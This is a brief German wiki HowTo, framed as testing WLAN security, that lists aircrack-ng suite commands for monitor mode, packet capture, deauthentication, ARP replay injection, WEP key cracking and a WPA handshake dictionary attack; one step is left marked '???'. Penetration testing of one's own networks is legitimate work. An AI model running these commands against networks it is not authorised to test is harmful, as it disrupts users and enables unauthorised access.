Sicherheit von WLan Netzwerken überprüfen

Aus Laub-Home.de Wiki
Zur Navigation springen Zur Suche springen

Anmerkung:

Dieses HowTo wurde für die BackToTrack Distribution geschrieben, sollte aber auch auf andere Linux Distributionen mit dem richtigen WLan Treiber umsetzbar sein. Der Knackpunkt ist der Monitor Mode der W-Lan Karte.

Nic in den Monitor Mode setzten:

iwconfig
wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor

Wlan Netze suchen:

airodump-ng ath0

Dump Datei erzeugen: -c Channel –bssid Mac des Accesspoints -w Dump-dateiname

airodump-ng -c 6 --bssid 00:00:00:00 -w testdump ath0

Test nach Mac Sicherheit: -e SSID -a MAC des Accespoints -h eigene MAC

aireplay-ng -1 0 -e WLAN -a 00:04:0E:D8:62:A5 -h 00:15:AF:8D:A6:B3 ath0

???

aireplay-ng -1 30 -e WLAN -a 00:04:0E:D8:62:A5 -h 00:15:AF:8D:A6:B3 ath0
aireplay-ng -0 10 -e WLAN -a 00:04:0E:D8:62:A5 -h 00:15:AF:8D:A6:B3 ath0

Pakete übertragen:

aireplay-ng -3 -b 00:90:4B:73:B3:A2 -h 00:15:AF:8D:A6:B3 ath0

WEP Schlüssel rausfinden: -z Dump-Dateiname

aircrack-ng testdump-01.cap

WPA Attacke: Man benötigt eine Client Mac und einen Client der im Netz ist.

aireplay-ng -0 5 -e SSID -a BSSID -c ClientMac ath0
aircrack-ng file.cap -a 2 -b BSSID -w passwordlist.txt

WLan Karte wieder in den nornmalen Mode setzten

wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode standard